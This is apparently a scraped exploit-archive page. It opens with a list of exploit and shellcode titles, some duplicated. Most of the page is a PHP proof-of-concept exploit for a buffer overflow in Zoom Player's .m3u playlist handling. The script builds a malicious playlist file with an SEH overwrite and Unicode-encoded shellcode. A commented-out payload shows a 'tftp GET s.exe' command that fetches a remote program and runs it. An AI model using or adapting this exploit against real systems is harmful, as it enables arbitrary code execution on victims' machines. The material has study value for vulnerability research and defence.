
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
59 lines
No EOL
2.3 KiB
PHP
59 lines
No EOL
2.3 KiB
PHP
source: https://www.securityfocus.com/bid/27007/info
|
|
|
|
Zoom Player is prone to a buffer-overflow vulnerability.
|
|
|
|
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application or to crash the application, denying further service to legitimate users.
|
|
|
|
This issue affects Zoom Player 6.00 beta 2 and all releases contained in the Zoom Player 5 branch.
|
|
|
|
<?php
|
|
/*
|
|
Zoom Player Pro v.3.30 .m3u file buffer overflow exploit (seh)
|
|
by Nine:Situations:Group::surfista
|
|
|
|
seems the same of http://secunia.com/advisories/28214/
|
|
bug found by Luigi Auriemma
|
|
no full working exploit out, so I made my test version
|
|
/*
|
|
/*
|
|
//original shellcode, 27 bytes + command
|
|
//re-encode with
|
|
//alpha2 --unicode ecx <sh.txt
|
|
$scode =
|
|
"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".
|
|
"\xbb\x0d\x25\x86\x7c". //WinExec, kernel32.dll XP SP3
|
|
"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff".
|
|
"cmd /c tftp -i 192.168.0.1 GET s s.exe && s && ".
|
|
"\xff";
|
|
*/
|
|
|
|
$_scode="IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1".
|
|
"AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBhkMC1Kn".
|
|
"QWPnpNQGP3XPCPJaCEkJmo5TFsLYoHSNQUpiXgxyoKOKOosPmOtKpNOQSKp1d36rTp".
|
|
"pkpNMpimPNQp9nRlnnQP6lxNNlplnP1MPPGQ524O0RSO02SnN35rXPeKpLfKvKp43kpkvmVMPkOA";
|
|
|
|
$buff="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f".
|
|
"\x77\x77\x77".
|
|
str_repeat("\x61",0xfe8).
|
|
/* unicode preamble, alignment */
|
|
"\x6e". //add byte ptr [esi],ch, nop equivalent [*]
|
|
"\xd3\x45". //0x004500d3 unicode friendly pop - pop - ret, zplayer.exe
|
|
"\x6e". //*
|
|
"\x05\x7f\x4c". //add eax,4c007f00h
|
|
"\x6e". //*
|
|
"\x2d\x59\x4c". //sub eax,4c005900h
|
|
"\x6e". //*
|
|
"\x50". //push eax
|
|
"\x6e". //*
|
|
"\x59". //pop ecx
|
|
str_repeat("\x6e\x90",0x7f). //nop
|
|
"\x6e". //*
|
|
"\x6a". //push 0, nop equivalent
|
|
$_scode.
|
|
str_repeat("\x90",0xbb8);
|
|
$_fp=@fopen("pwn.m3u","w+");
|
|
if (!$_fp) { die("[:(] Failed to create file...");}
|
|
fputs($_fp,$buff);
|
|
fclose($_fp);
|
|
print("[:)] Done!");
|
|
?>
|